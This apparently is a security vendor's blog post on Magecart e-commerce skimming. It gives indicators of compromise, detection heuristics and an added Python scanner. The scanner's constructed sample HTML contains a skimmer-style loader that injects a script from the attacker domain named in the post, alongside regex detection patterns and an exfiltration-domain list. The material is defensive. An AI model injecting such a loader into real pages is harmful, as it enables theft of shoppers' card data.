Magecart is a name used for a group of threat actors utilizing a family of malicious supply-chain attacks or application exploits that target ecommerce systems. Magecart has gained notoriety and made headlines in the past year after a number of high-profile attacks. Alert Logic threat researchers have monitored activity related to the Magecart threat actor campaigns—tracking behavior and identifying related tools, techniques and procedures over the past year.
Magecart Indicators of Compromise
Note: We have placed brackets around the dot in domain names to ensure they cannot be inadvertently clicked.
Building on the comprehensive work done by an array of cybersecurity vendors and professionals—especially RiskIQ and gwillem—we’ve been tracking the domains and IP addresses used by the threat actors to exfiltrate data. During that time, our researchers and Security Operations Center (SOC) analysts have also directly observed successful data exfiltration. We’ve identified several additional Indicators of Compromise (IOCs) that demonstrate how the attackers continue to adapt and evolve their behavior to evade detection.
Successful Magecart Attacks
The data exfiltration we observed was interesting because we initially caught it in plain text, and then saw the attacker move the channel to HTTPS. During our code analysis of [customer_domain]_autoload.js we found that the exfiltration domain had been changed from verpayment to secureqbrowser[.]com. The deeper investigation into Magecart activity allowed us to release a new telemetry rule to track communications with this domain.
We noticed that the script name was made up of the compromised site's domain and autoload.js. Using this knowledge, we were able to actively scan the attacker infrastructure for other domains that could be assumed to be compromised. Starting with the Alexa top million domains, we identified 5 new samples and multiple compromised sites in the wild. Once the method was proven, we collated a list of known Alert Logic customer domains and compared it against the list of known compromised domains to evaluate the risk to our customers.
Monitoring for Magecart Activity
In order to proactively identify Alert Logic customers who may be running a website that has been compromised by Magecart threat actors, we have been actively scanning sets of our customer websites for the presence of the following code. Our research indicates that this code correlates with a high probability that the host has been compromised:
true; po[.]src = '//magecart_mal_domain;
This should be correlated with suspicious modification dates on individual .js resources when compared to the other files on the system.
One of the more fruitful mechanisms for detecting Magecart relies on the attacker embedding a known malicious script (and in some cases a Command and Control (C&C) domain) in the webpage's HTML. Detecting the presence of that domain string in the page returned to the client can therefore indicate compromise. However, the number of cases exhibiting this behavior is decreasing, as an increasing amount of the data exfiltration is being executed on the client side. Keeping pace with threat actors of this type, who continue to innovate their tactics, requires OSINT and large-scale data analysis married with the ability to release and analyze coverage quickly. You have to strike while the iron is hot.
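The three checks described above (the loader fragment that points a script element's src at an external host, a script named after the compromised site with the _autoload.js suffix, and a known exfiltration domain string anywhere in the returned page), plus the modification-date correlation, can be combined into one scanner run over fetched HTML and a file listing. The following Python is an added example and not Alert Logic's tooling. It assumes a hypothetical shop at shop.example, constructed sample HTML and timestamps, a one-day tolerance for the date check, and that the loader's variable name may differ from "po" between samples, so any identifier is accepted; the only real indicator it carries is secureqbrowser[.]com from the post.

```python
"""Scan served HTML and file metadata for the Magecart indicators described in the post.
Added example; all sample inputs are constructed, not taken from a real compromise."""
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Exfiltration domains, kept defanged as the post writes them. secureqbrowser[.]com
# is from the post; extend this set from your own threat intelligence.
KNOWN_EXFIL_DOMAINS = {"secureqbrowser[.]com"}

# The loader fragment quoted in the post assigns a protocol-relative URL to a script
# element's src ("true; po.src = '//...'"). Assumption: the variable name varies, so
# any identifier followed by .src is accepted rather than only "po".
SRC_ASSIGN_RE = re.compile(r"""\b\w+\.src\s*=\s*['"]//([^'"/\s]+)""")
# Any external script reference in the HTML.
SCRIPT_SRC_RE = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*['"]([^'"]+)['"]""", re.I)


def defang(domain):
    return domain.replace(".", "[.]")


def refang(domain):
    return domain.replace("[.]", ".")


def find_exfil_indicators(html, site_domain, known_domains=KNOWN_EXFIL_DOMAINS):
    """Return (indicator, value) pairs found in the HTML served for site_domain."""
    findings = []

    def add(kind, value):
        if (kind, value) not in findings:
            findings.append((kind, value))

    # 1. Inline loader that points a script element at an external host.
    for host in SRC_ASSIGN_RE.findall(html):
        add("src_assignment", defang(host.lower()))

    # 2. Script named <compromised domain>_autoload.js, the naming the post observed.
    expected_name = f"{site_domain}_autoload.js"
    for src in SCRIPT_SRC_RE.findall(html):
        if urlparse(src).path.rsplit("/", 1)[-1] == expected_name:
            add("autoload_script", src)

    # 3. Known exfiltration domain string anywhere in the returned page.
    lowered = html.lower()
    for domain in sorted(known_domains):
        if refang(domain).lower() in lowered:
            add("known_exfil_domain", domain)

    return findings


def suspicious_js_mtimes(files, tolerance=timedelta(days=1)):
    """files maps path -> last-modified datetime. Flag .js files modified later than
    every non-.js file by more than the tolerance: an injected skimmer is often the
    only thing touched after the last legitimate deployment."""
    baseline = max((t for p, t in files.items() if not p.endswith(".js")), default=None)
    if baseline is None:
        return []
    return sorted(p for p, t in files.items() if p.endswith(".js") and t - baseline > tolerance)


# Constructed sample page for the hypothetical shop.example site.
SAMPLE_HTML = """<html><head>
<script src="/js/jquery.min.js"></script>
<script src="/skin/shop.example_autoload.js"></script>
<script>
var po = document.createElement('script'); po.type = 'text/javascript';
po.async = true; po.src = '//secureqbrowser.com/loader.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
</script>
</head><body>checkout</body></html>"""

# Constructed file listing with modification times (hypothetical values).
SAMPLE_MTIMES = {
    "index.php": datetime(2018, 9, 1, 10, 0),
    "skin/style.css": datetime(2018, 9, 1, 10, 5),
    "js/jquery.min.js": datetime(2018, 9, 1, 10, 5),
    "skin/shop.example_autoload.js": datetime(2018, 11, 14, 3, 22),
}

if __name__ == "__main__":
    for kind, value in find_exfil_indicators(SAMPLE_HTML, "shop.example"):
        print(f"{kind}: {value}")
    for path in suspicious_js_mtimes(SAMPLE_MTIMES):
        print(f"recently modified .js: {path}")
```

Each finding is reported defanged so the output can be pasted into a ticket safely. The date check is a heuristic: sites that deploy JavaScript independently of their templates will need a tighter comparison set, such as only files under the same theme directory.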